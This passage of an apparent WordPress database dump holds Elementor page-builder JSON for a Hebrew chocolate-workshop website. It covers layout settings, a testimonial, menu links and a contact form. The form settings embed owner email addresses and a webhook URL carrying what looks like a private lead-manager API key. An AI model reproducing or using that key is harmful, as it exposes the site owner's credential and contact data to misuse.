\\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":91,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/BG.jpg\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":53},\"typography_font_weight\":\"400\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":27},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\",\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"normal\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(1518,315,'_elementor_version','0.4'),(1521,157,'_edit_lock','1549199244:1'),(1529,318,'_elementor_template_type','page'),(1530,318,'_elementor_edit_mode','builder'),(1531,318,'_wp_page_template','default'),(1532,318,'_elementor_data','[{\"id\":\"5143e12f\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"71c4466d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"5c8ffdc1\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48141d39\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"50bf4905\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"d5a34b\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\",\"menu\":\"%d7%a8%d7%90%d7%a9%d7%99\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"60b32fa\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"f297d92\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"e0d5494\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05db\\u05ea\\u05d5\\u05d1 \\u05d0\\u05ea \\u05d4\\u05db\\u05d5\\u05ea\\u05e8\\u05ea \\u05db\\u05d0\\u05df\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"97fc875\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9efbb93\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"31e0ebc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e6\\u05d3\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"_id\":\"message\",\"field_type\":\"textarea\",\"field_label\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"placeholder\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"message\"}],\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"submit_actions\":[\"email\",\"webhook\"],\"webhooks\":\"https:\\/\\/api.leadmanager.co.il\\/handlers\\/lm\\/submit.cms?lm_form=34779&lm_key=ec25004589054b7cb52f27a1c66716ff&lm_supplier={\\u05de\\u05e1\\u05e4\\u05e8 \\u05e1\\u05e4\\u05e7}&lm_bc={\\u05db\\u05dc\\u05d9 \\u05e4\\u05e8\\u05e1\\u05d5\\u05de\\u05d9}\",\"webhooks_advanced_data\":\"\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34056794\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"79ba6502\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c9740a4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"62d9ea7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2a4010bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"527df496\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"227b633f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"73e3f56a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a1d5ee3\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"28ab3e99\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7b6d813b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"702cf53c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 